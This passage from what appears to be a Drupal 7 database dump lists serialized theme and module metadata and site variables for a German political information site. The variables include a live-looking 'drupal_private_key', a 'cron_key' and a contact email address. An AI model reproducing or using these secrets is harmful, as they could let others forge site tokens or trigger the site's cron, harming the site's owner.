:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:6:\"Bartik\";s:11:\"description\";s:48:\"A flexible, recolorable theme with many regions.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:28:\"themes/bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1445457729;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";}s:7:\"garland\";O:8:\"stdClass\":10:{s:8:\"filename\";s:27:\"themes/garland/garland.info\";s:4:\"name\";s:7:\"garland\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:7:\"Garland\";s:11:\"description\";s:111:\"A multi-column theme which can be configured to modify colors and switch between fixed and fluid width layouts.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:8:\"settings\";a:1:{s:13:\"garland_width\";s:5:\"fluid\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:29:\"themes/garland/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1445457729;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";}s:12:\"multipurpose\";O:8:\"stdClass\":10:{s:8:\"filename\";s:47:\"sites/all/themes/multipurpose/multipurpose.info\";s:4:\"name\";s:12:\"multipurpose\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:18:\"Multipurpose Theme\";s:11:\"description\";s:112:\"Multipurpose Theme is a premium Drupal 7 theme. Developed by Devsaran.com.\";s:4:\"core\";s:3:\"7.x\";s:6:\"engine\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:2:{s:9:\"style.css\";s:39:\"sites/all/themes/multipurpose/style.css\";s:18:\"css/responsive.css\";s:48:\"sites/all/themes/multipurpose/css/responsive.css\";}}s:7:\"scripts\";a:3:{s:12:\"js/retina.js\";s:42:\"sites/all/themes/multipurpose/js/retina.js\";s:13:\"js/plugins.js\";s:43:\"sites/all/themes/multipurpose/js/plugins.js\";s:12:\"js/global.js\";s:42:\"sites/all/themes/multipurpose/js/global.js\";}s:7:\"regions\";a:15:{s:13:\"sidebar_first\";s:13:\"First Sidebar\";s:6:\"header\";s:6:\"Header\";s:13:\"preface_first\";s:13:\"Preface First\";s:14:\"preface_middle\";s:14:\"Preface Middle\";s:12:\"preface_last\";s:12:\"Preface Last\";s:11:\"content_top\";s:11:\"Content Top\";s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:6:\"footer\";s:6:\"Footer\";s:12:\"footer_first\";s:12:\"First Bottom\";s:13:\"footer_second\";s:13:\"Second Bottom\";s:12:\"footer_third\";s:12:\"Third Bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:4:\"name\";i:2;s:6:\"slogan\";i:3;s:17:\"node_user_picture\";i:4;s:20:\"comment_user_picture\";i:5;s:25:\"comment_user_verification\";i:6;s:7:\"favicon\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:8:\"settings\";a:8:{s:17:\"slideshow_display\";s:1:\"1\";s:11:\"breadcrumbs\";s:1:\"1\";s:10:\"image_logo\";s:1:\"0\";s:18:\"socialicon_display\";s:1:\"1\";s:12:\"facebook_url\";s:39:\"http://www.facebook.com/devsaran.drupal\";s:11:\"twitter_url\";s:34:\"http://www.twitter.com/saranquardz\";s:15:\"google_plus_url\";s:49:\"https://plus.google.com/u/0/109064032428497406718\";s:13:\"pinterest_url\";s:20:\"http://pinterest.com\";}s:7:\"version\";s:7:\"7.x-1.0\";s:7:\"project\";s:12:\"multipurpose\";s:9:\"datestamp\";s:10:\"1409600329\";s:10:\"screenshot\";s:44:\"sites/all/themes/multipurpose/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:5:\"mtime\";i:1434659475;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";}s:17:\"responsive_bartik\";O:8:\"stdClass\":10:{s:8:\"filename\";s:57:\"sites/all/themes/responsive_bartik/responsive_bartik.info\";s:4:\"name\";s:17:\"responsive_bartik\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:17:\"Responsive Bartik\";s:11:\"description\";s:86:\"A flexible, recolorable theme with many regions and a responsive, mobile-first layout.\";s:7:\"version\";s:7:\"7.x-1.0\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:49:\"sites/all/themes/responsive_bartik/css/layout.css\";s:13:\"css/style.css\";s:48:\"sites/all/themes/responsive_bartik/css/style.css\";s:14:\"css/colors.css\";s:49:\"sites/all/themes/responsive_bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:48:\"sites/all/themes/responsive_bartik/css/print.css\";}}s:7:\"scripts\";a:1:{s:22:\"js/collapsible-menu.js\";s:57:\"sites/all/themes/responsive_bartik/js/collapsible-menu.js\";}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:17:\"responsive_bartik\";s:9:\"datestamp\";s:10:\"1413392482\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:49:\"sites/all/themes/responsive_bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:5:\"mtime\";i:1434659475;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";}s:5:\"seven\";O:8:\"stdClass\":10:{s:8:\"filename\";s:23:\"themes/seven/seven.info\";s:4:\"name\";s:5:\"seven\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:5:\"Seven\";s:11:\"description\";s:65:\"A simple one-column, tableless, fluid width administration theme.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"1\";}s:7:\"regions\";a:8:{s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:13:\"sidebar_first\";s:13:\"First sidebar\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:14:\"regions_hidden\";a:3:{i:0;s:13:\"sidebar_first\";i:1;s:8:\"page_top\";i:2;s:11:\"page_bottom\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/seven/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1445457729;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";}s:5:\"stark\";O:8:\"stdClass\":10:{s:8:\"filename\";s:23:\"themes/stark/stark.info\";s:4:\"name\";s:5:\"stark\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:5:\"Stark\";s:11:\"description\";s:208:\"This theme demonstrates Drupal\'s default HTML markup and CSS styles. To learn how to build your own theme and override Drupal\'s default code, see the Theming Guide.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/stark/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1445457729;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";}}s:9:\"filepaths\";a:42:{i:0;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:5:\"block\";s:8:\"filepath\";s:26:\"modules/block/block.module\";}i:1;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:7:\"adsense\";s:8:\"filepath\";s:40:\"sites/all/modules/adsense/adsense.module\";}i:2;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:13:\"adsense_click\";s:8:\"filepath\";s:68:\"sites/all/modules/adsense/contrib/adsense_click/adsense_click.module\";}i:3;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:11:\"adsense_cse\";s:8:\"filepath\";s:48:\"sites/all/modules/adsense/cse/adsense_cse.module\";}i:4;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:15:\"adsense_managed\";s:8:\"filepath\";s:56:\"sites/all/modules/adsense/managed/adsense_managed.module\";}i:5;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:15:\"adsense_oldcode\";s:8:\"filepath\";s:60:\"sites/all/modules/adsense/old/oldcode/adsense_oldcode.module\";}i:6;a:3:{s:4:\"type\";s:5:\"theme\";s:4:\"name\";s:6:\"bartik\";s:8:\"filepath\";s:25:\"themes/bartik/bartik.info\";}i:7;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:4:\"blog\";s:8:\"filepath\";s:24:\"modules/blog/blog.module\";}i:8;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:5:\"color\";s:8:\"filepath\";s:26:\"modules/color/color.module\";}i:9;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:7:\"comment\";s:8:\"filepath\";s:30:\"modules/comment/comment.module\";}i:10;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:7:\"contact\";s:8:\"filepath\";s:30:\"modules/contact/contact.module\";}i:11;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:10:\"contextual\";s:8:\"filepath\";s:36:\"modules/contextual/contextual.module\";}i:12;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:9:\"dashboard\";s:8:\"filepath\";s:34:\"modules/dashboard/dashboard.module\";}i:13;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:5:\"dblog\";s:8:\"filepath\";s:26:\"modules/dblog/dblog.module\";}i:14;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:5:\"field\";s:8:\"filepath\";s:26:\"modules/field/field.module\";}i:15;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:17:\"field_sql_storage\";s:8:\"filepath\";s:64:\"modules/field/modules/field_sql_storage/field_sql_storage.module\";}i:16;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:8:\"field_ui\";s:8:\"filepath\";s:32:\"modules/field_ui/field_ui.module\";}i:17;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:4:\"file\";s:8:\"filepath\";s:24:\"modules/file/file.module\";}i:18;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:6:\"filter\";s:8:\"filepath\";s:28:\"modules/filter/filter.module\";}i:19;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:4:\"help\";s:8:\"filepath\";s:24:\"modules/help/help.module\";}i:20;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:5:\"image\";s:8:\"filepath\";s:26:\"modules/image/image.module\";}i:21;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:4:\"list\";s:8:\"filepath\";s:38:\"modules/field/modules/list/list.module\";}i:22;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:4:\"menu\";s:8:\"filepath\";s:24:\"modules/menu/menu.module\";}i:23;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:4:\"node\";s:8:\"filepath\";s:24:\"modules/node/node.module\";}i:24;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:6:\"number\";s:8:\"filepath\";s:42:\"modules/field/modules/number/number.module\";}i:25;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:7:\"options\";s:8:\"filepath\";s:44:\"modules/field/modules/options/options.module\";}i:26;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:7:\"overlay\";s:8:\"filepath\";s:30:\"modules/overlay/overlay.module\";}i:27;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:4:\"path\";s:8:\"filepath\";s:24:\"modules/path/path.module\";}i:28;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:3:\"php\";s:8:\"filepath\";s:22:\"modules/php/php.module\";}i:29;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:3:\"rdf\";s:8:\"filepath\";s:22:\"modules/rdf/rdf.module\";}i:30;a:3:{s:4:\"type\";s:5:\"theme\";s:4:\"name\";s:17:\"responsive_bartik\";s:8:\"filepath\";s:57:\"sites/all/themes/responsive_bartik/responsive_bartik.info\";}i:31;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:6:\"search\";s:8:\"filepath\";s:28:\"modules/search/search.module\";}i:32;a:3:{s:4:\"type\";s:5:\"theme\";s:4:\"name\";s:5:\"seven\";s:8:\"filepath\";s:23:\"themes/seven/seven.info\";}i:33;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:8:\"shortcut\";s:8:\"filepath\";s:32:\"modules/shortcut/shortcut.module\";}i:34;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:10:\"statistics\";s:8:\"filepath\";s:36:\"modules/statistics/statistics.module\";}i:35;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:6:\"system\";s:8:\"filepath\";s:28:\"modules/system/system.module\";}i:36;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:8:\"taxonomy\";s:8:\"filepath\";s:32:\"modules/taxonomy/taxonomy.module\";}i:37;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:4:\"text\";s:8:\"filepath\";s:38:\"modules/field/modules/text/text.module\";}i:38;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:7:\"toolbar\";s:8:\"filepath\";s:30:\"modules/toolbar/toolbar.module\";}i:39;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:6:\"update\";s:8:\"filepath\";s:28:\"modules/update/update.module\";}i:40;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:4:\"user\";s:8:\"filepath\";s:24:\"modules/user/user.module\";}i:41;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:8:\"standard\";s:8:\"filepath\";s:34:\"profiles/standard/standard.profile\";}}}',0,1451358991,1),('variables','a:99:{s:11:\"admin_theme\";s:5:\"seven\";s:20:\"adsense_access_pages\";s:0:\"\";s:16:\"adsense_basic_id\";s:20:\"pub-4101373333307108\";s:22:\"adsense_click_tracking\";i:1;s:35:\"adsense_click_tracking_name_resolve\";i:1;s:15:\"adsense_disable\";i:0;s:17:\"adsense_id_module\";s:13:\"adsense_basic\";s:26:\"adsense_oldcode_ad_block_0\";s:27:\"Add+Sense:468x60:1:1:center\";s:19:\"adsense_placeholder\";i:1;s:24:\"adsense_placeholder_text\";s:14:\"Google AdSense\";s:21:\"adsense_secret_adtest\";i:0;s:23:\"adsense_secret_language\";s:0:\"\";s:25:\"adsense_section_targeting\";i:1;s:17:\"adsense_test_mode\";i:1;s:19:\"adsense_unblock_ads\";i:0;s:18:\"adsense_visibility\";s:1:\"0\";s:9:\"anonymous\";s:9:\"Anonymous\";s:9:\"clean_url\";s:1:\"0\";s:18:\"color_bartik_files\";a:2:{i:0;s:39:\"public://color/bartik-56d50557/logo.png\";i:1;s:41:\"public://color/bartik-56d50557/colors.css\";}s:17:\"color_bartik_logo\";s:39:\"public://color/bartik-56d50557/logo.png\";s:20:\"color_bartik_palette\";a:9:{s:3:\"top\";s:7:\"#c7750f\";s:6:\"bottom\";s:7:\"#c7380f\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}s:24:\"color_bartik_stylesheets\";a:1:{i:0;s:41:\"public://color/bartik-56d50557/colors.css\";}s:29:\"color_responsive_bartik_files\";a:2:{i:0;s:50:\"public://color/responsive_bartik-d0475e58/logo.png\";i:1;s:52:\"public://color/responsive_bartik-d0475e58/colors.css\";}s:28:\"color_responsive_bartik_logo\";s:50:\"public://color/responsive_bartik-d0475e58/logo.png\";s:31:\"color_responsive_bartik_palette\";a:9:{s:3:\"top\";s:7:\"#8e2105\";s:6:\"bottom\";s:7:\"#c3741d\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}s:35:\"color_responsive_bartik_stylesheets\";a:1:{i:0;s:52:\"public://color/responsive_bartik-d0475e58/colors.css\";}s:12:\"comment_page\";i:0;s:22:\"configurable_timezones\";i:1;s:8:\"cron_key\";s:43:\"JPDDA7rlRpp1WMsbNvF6rOZOA2x2SGsiRDMA8yPtkZM\";s:9:\"cron_last\";i:1451358983;s:19:\"cron_safe_threshold\";s:5:\"21600\";s:19:\"css_js_query_string\";s:6:\"nwa2ys\";s:21:\"date_default_timezone\";s:13:\"Europe/Berlin\";s:14:\"date_first_day\";s:1:\"1\";s:18:\"default_nodes_main\";s:2:\"10\";s:25:\"drupal_http_request_fails\";b:0;s:18:\"drupal_private_key\";s:43:\"kJdWssORlZVxf4_00HrHYW_Uc1uL9uw59cuWZSdAvsw\";s:17:\"email__active_tab\";s:24:\"edit-email-admin-created\";s:22:\"empty_timezone_message\";i:0;s:19:\"file_temporary_path\";s:4:\"/tmp\";s:22:\"filter_fallback_format\";s:10:\"plain_text\";s:15:\"install_profile\";s:8:\"standard\";s:12:\"install_task\";s:4:\"done\";s:12:\"install_time\";i:1426848645;s:16:\"maintenance_mode\";b:0;s:24:\"maintenance_mode_message\";s:103:\"Pirat im Talrat is currently under maintenance. We should be back shortly. Thank you for your patience.\";s:13:\"menu_expanded\";a:0:{}s:10:\"menu_masks\";a:34:{i:0;i:501;i:1;i:493;i:2;i:250;i:3;i:247;i:4;i:246;i:5;i:245;i:6;i:125;i:7;i:123;i:8;i:122;i:9;i:121;i:10;i:117;i:11;i:63;i:12;i:62;i:13;i:61;i:14;i:60;i:15;i:59;i:16;i:58;i:17;i:44;i:18;i:31;i:19;i:30;i:20;i:29;i:21;i:28;i:22;i:24;i:23;i:21;i:24;i:15;i:25;i:14;i:26;i:13;i:27;i:11;i:28;i:7;i:29;i:6;i:30;i:5;i:31;i:3;i:32;i:2;i:33;i:1;}s:16:\"node_admin_theme\";s:1:\"1\";s:14:\"node_cron_last\";s:10:\"1446488130\";s:17:\"node_options_page\";a:1:{i:0;s:6:\"status\";}s:19:\"node_submitted_page\";b:0;s:20:\"path_alias_whitelist\";a:0:{}s:8:\"site_403\";s:0:\"\";s:8:\"site_404\";s:0:\"\";s:20:\"site_default_country\";s:2:\"DE\";s:14:\"site_frontpage\";s:4:\"node\";s:9:\"site_mail\";s:20:\"piratolli@ollital.de\";s:9:\"site_name\";s:15:\"Pirat im Talrat\";s:11:\"site_slogan\";s:44:\"Informationen vom Piraten im Wuppertaler 